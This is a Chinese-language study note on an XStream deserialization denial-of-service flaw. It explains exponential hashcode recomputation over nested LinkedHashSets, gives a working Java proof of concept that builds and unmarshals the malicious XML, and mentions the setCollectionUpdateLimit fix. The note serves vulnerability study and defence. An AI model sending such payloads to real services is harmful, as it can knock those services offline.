漏洞原理
- 漏洞通告:https://www.tenable.com/plugins/nessus/157887
- POC:
- 代码变更:
攻击POC
- 原理理解:每次都要循环重新计算hashcode,性能消耗成指数级上涨。
- s1,s2,t1,t2 …
- As soon as the XML is unmarshalled, the hash codes of the elements are calculated and the calculation time increases exponentially due to the highly recursive structure. ``` import com.thoughtworks.xstream.XStream;
import java.util.LinkedHashSet; import java.util.Set;
public class Xstream01Test {
public static void testDoSAttackWithLinkedHashSet() {final Set set = new LinkedHashSet();Set s1 = set;Set s2 = new LinkedHashSet();for (int i = 0; i < 30; i++) {final Set t1 = new LinkedHashSet();final Set t2 = new LinkedHashSet();t1.add("a");t2.add("b");s1.add(t1);s1.add(t2);s2.add(t2);s2.add(t1);s1 = t1;s2 = t2;}XStream xstream = new XStream();final String xml = xstream.toXML(set); // 攻击POC生成.System.out.println(xml);xstream.fromXML(xml); // sink点}public static void main(String[] args) throws Exception{long start = System.currentTimeMillis();testDoSAttackWithLinkedHashSet();long finish = System.currentTimeMillis();System.out.println(finish - start);}
}
```
拓展思考
- 其他XML解析工具是否有同类问题?
- Fastjson这样的Json是否也有同类循环嵌套的问题?
- 具体修复代码(看SecurityUtils),是如何解决这个问题的?
- 增加一个函数(xstream.setCollectionUpdateLimit(5),可以手工限定最多5层)
- 其他xstream的反序列化Gadget理解分析
若有收获,就点个赞吧
0 人点赞
